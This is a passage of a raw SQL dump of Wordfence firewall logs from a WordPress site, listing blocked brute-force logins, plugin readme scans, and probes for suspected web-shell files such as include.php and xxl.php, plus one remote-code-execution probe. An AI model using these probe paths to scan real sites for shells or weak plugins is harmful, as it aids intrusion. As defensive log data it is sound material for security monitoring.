NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14265,0.000000,1704527420.218778,'\0\0\0\0\0\0\0\0\0\0zb',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14259,1704521630.829846,1704521630.721000,'\0\0\0\0\0\0\0\0\0\0^@x',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(14261,0.000000,1704522505.566476,' A0\0\0\0\0\0\0\0M',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14262,0.000000,1704522581.331694,'\0\0\0\0\0\0\0\0\0\0]',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14263,0.000000,1704524186.659937,'\0\0\0\0\0\0\0\0\0\0]',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14260,0.000000,1704521975.532751,'\0\0\0\0\0\0\0\0\0\0[f',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14278,0.000000,1704537205.272012,'\0\0\0\0\0\0\0\0\0\0\"]B',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14158,1704486473.729347,1704486473.649600,'\0\0\0\0\0\0\0\0\0\0e\0',0,200,0,0,0,'https://mail.tummyrevolution.com/wp-content/plugins/select-core/readme.txt',NULL,'python-requests/2.27.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZWxlY3QtY29yZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZWxlY3QtY29yZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(15759,0.000000,1705068868.470073,'\0\0\0\0\0\0\0\0\0\03[<',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15760,0.000000,1705074714.220525,'\0\0\0\0\0\0\0\0\0\0b7',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14157,0.000000,1704486171.740946,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15754,0.000000,1705059754.382514,'\0\0\0\0\0\0\0\0\0\0>Ab',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15755,0.000000,1705061270.013517,'\0\0\0\0\0\0\0\0\0\0՘',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15756,0.000000,1705063124.474801,'\0\0\0\0\0\0\0\0\0\0ǽ{',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15757,1705065387.573661,1705065387.509700,'\0\0\0\0\0\0\0\0\0\0. ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'python-requests/2.25.1','blocked:waf','WAF-RULE-652','{\"learningMode\":0,\"failedRules\":\"652\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvdHVtbW15b3YvdHVtbXlyZXZvbHV0aW9uLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYmFja3VwLWJhY2t1cC9pbmNsdWRlcy9iYWNrdXAtaGVhcnQucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"rce\",\"ssl\":1}'),(15752,0.000000,1705057914.988993,'\0\0\0\0\0\0\0\0\0\0z\"',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15753,0.000000,1705059683.649845,'\0\0\0\0\0\0\0\0\0\0[y[',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14152,0.000000,1704481180.235079,'$\0\0830\06',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15758,1705066249.882334,1705066249.814200,'\0\0\0\0\0\0\0\0\0\03ޞ',0,403,0,0,0,'https://tummyrevolution.com/style.php?sig=update&domain=51.79.124.111','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14153,0.000000,1704481762.805689,'\0\0\0\0\0\0\0\0\0\0u',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14154,0.000000,1704482840.428067,'\0\0\0\0\0\0\0\0\0\0م',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14155,0.000000,1704483183.050876,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14156,0.000000,1704484510.636040,'\0\0\0\0\0\0\0\0\0\0t>ή',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14159,1704486473.728714,1704486473.649600,'\0\0\0\0\0\0\0\0\0\0e\0',0,200,0,0,0,'https://mail.tummyrevolution.com/wp-content/plugins/select-core/readme.txt',NULL,'python-requests/2.27.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZWxlY3QtY29yZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZWxlY3QtY29yZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(14169,1704490350.087410,1704490349.986700,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/wp-includes/widgets/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvaW5jbHVkZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14303,1704552067.735380,1704552067.647500,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/xxl.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3h4bC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14160,1704486487.458349,1704486487.382600,'\0\0\0\0\0\0\0\0\0\0e\0',0,200,0,0,0,'https://mail.tummyrevolution.com/wp-content/plugins/js_composer/readme.txt',NULL,'python-requests/2.27.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qc19jb21wb3Nlci9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qc19jb21wb3Nlci9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(14317,0.000000,1704567399.589658,'\0\0\0\0\0\0\0\0\0\0`',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14318,0.000000,1704567811.412614,'\0\0\0\0\0\0\0\0\0\0э-',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14161,1704486487.457818,1704486487.382600,'\0\0\0\0\0\0\0\0\0\0e\0',0,200,0,0,0,'https://mail.tummyrevolution.com/wp-content/plugins/js_composer/readme.txt',NULL,'python-requests/2.27.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qc19jb21wb3Nlci9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qc19jb21wb3Nlci9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(14162,1704486478.761309,1704486478.700100,'\0\0\0\0\0\0\0\0\0\0e\0',0,200,0,0,0,'https://mail.tummyrevolution.com/wp-content/plugins/revslider/readme.txt',NULL,'python-requests/2.27.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZXZzbGlkZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZXZzbGlkZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(14168,1704490355.476831,1704490355.384000,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/xxl.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3h4bC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14163,1704486478.760885,1704486478.700100,'\0\0\0\0\0\0\0\0\0\0e\0',0,200,0,0,0,'https://mail.tummyrevolution.com/wp-content/plugins/revslider/readme.txt',NULL,'python-requests/2.27.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZXZzbGlkZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZXZzbGlkZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(14164,0.000000,1704487828.730300,'\0\0\0\0\0\0\0\0\0\0}',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14165,0.000000,1704489156.019557,'\0\0\0\0\0\0\0\0\0\09!',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14166,0.000000,1704489477.158282,'\0\0\0\0\0\0\0\0\0\0M',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14167,0.000000,1704490044.205414,'\0\0\0\0\0\0\0\0\0\0F=',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14316,0.000000,1704565801.616313,'\0\0\0\0\0\0\0\0\0\03k',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14170,1704490347.612442,1704490347.529900,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/wp-includes/images/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ltYWdlcy9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14314,0.000000,1704562564.078546,' A9\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14315,0.000000,1704565225.906468,'\0\0\0\0\0\0\0\0\0\0Al\'3',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14304,1704552041.772109,1704552041.707200,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/widgets/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvaW5jbHVkZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14171,1704490344.022842,1704490343.949700,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/wp-content/themes/twentyfive/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWZpdmUvaW5jbHVkZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14313,0.000000,1704560941.030919,'\0\0\0\0\0\0\0\0\0\0q+',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14172,1704490337.468005,1704490337.411600,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/wp-content/themes/sketch/404.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3NrZXRjaC80MDQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14311,0.000000,1704559299.734039,'\0\0\0\0\0\0\0\0\0\02tf',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14312,0.000000,1704559535.954262,'\0\0\0\0\0\0\0\0\0\0[z\n',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14305,1704552029.727792,1704552029.652000,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/images/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ltYWdlcy9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14173,1704490334.129231,1704490334.070400,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/wp-content/plugins/WordPressCore/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9Xb3JkUHJlc3NDb3JlL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14310,0.000000,1704557644.386069,'\0\0\0\0\0\0\0\0\0\0Ԙn',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14174,1704490329.744714,1704490329.660200,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/wp-content/themes/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14308,0.000000,1704553561.479409,'\0\0\0\0\0\0\0\0\0\06%#',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14309,0.000000,1704555549.071888,'\0\0\0\0\0\0\0\0\0\0}ѫ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14306,0.000000,1704552171.473805,'\0\0\0\0\0\0\0\0\0\0՘Y',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14175,1704490327.155219,1704490327.063000,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/wp-content/plugins/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A 